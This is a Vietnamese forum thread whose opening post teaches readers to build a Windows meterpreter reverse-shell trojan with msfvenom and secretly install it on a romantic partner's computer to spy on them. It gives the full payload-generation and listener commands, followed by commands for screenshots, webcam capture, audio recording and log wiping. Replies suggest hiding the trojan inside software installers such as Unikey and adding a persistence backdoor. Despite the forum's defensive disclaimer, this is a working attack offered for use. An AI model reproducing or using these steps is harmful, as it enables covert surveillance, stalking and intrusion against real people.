msfvenom-tao 1 trojan điều khiển máy nạn nhân

khanhhoangbkdn

VIP Members
07/10/2016
34
65 bài viết
msfvenom-tao 1 trojan điều khiển máy nạn nhân
Vào 1 đẹp trời bạn nghi ngờ người yêu bạn ngoại tình bạn không biết làm thế nào để xác nhận với có phải hay không ?
Bước đầu tiên bạn hay tải về metasploits nếu bạn không có. và làm theo các bước dưới đây để xem ny làm gì trên máy tính :D

B1: vào metasploits framework lệnh #msfconsole và tạo 1 trojan với lệnh
#msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b '\x60' -f exe -only -o /root/quanlyny.exe





-trojan này sẽ lưu lại với tên quanlyny.exe bằng cách nào đó copy qua máy victim và khoan hãy chạy lên

B2:sử dụng exploits handler để lắng nghe kết nối của máy victim
#use exploit/multi/handler





#set payload windows/x64/meterpreter/reverse_tcp
#set lhost myip(nếu cùng mạng thì gõ ifconfig để lấy ip của mình ,còn khác mạng thì vào trang https://www.whatismyip .com/ để xem ip public)
#set lport 4444
#exploit (đợi kết nối từ máy victim nếu victim chạy file quanlyny.exe thì sẽ có 1 session được tạo ra )

B3:hiển thị session mới tạo ra #sessions -v
Kết nối tới session với lệnh #sessions -i -1
Bây giờ ta có 1 shell với meterpreter đến đây bạn có thể khai thác trên máy victim với các lệnh





#screenshot //chụp màn hình victim
#run webcam -l //Gọi webcam trên máy nạn nhân ta có
#clearev //Xóa file log trên máy nạn nhân
#run sound_recorder -h //ghi âm máy nạn nhân

Còn nhiều lệnh nữa các bạn tự tìm hiểu
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: Johnathan Huu Tri
Bạn có cách nào để trojan auto khởi động không nhỉ :#
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bạn có thể chèn vào các file cài đặt như unikey chẳng hạn
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cho em hỏi nếu victim shutdown máy và không chạy file đó nữa thì mình cũng không kết nối được luôn đúng không ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cho em hỏi nếu victim shutdown máy và không chạy file đó nữa thì mình cũng không kết nối được luôn đúng không ạ?
Đúng rồi bạn. Khi xâm nhập vào hệ thống bạn phải cần backdoor. Để khi nạn nhân mở lại máy tính, bạn vẫn nhận được kết nối shell tới máy tính nạn nhân...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
liệu có bốc lên điện thoại được không nhỉ các pro, iphone
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên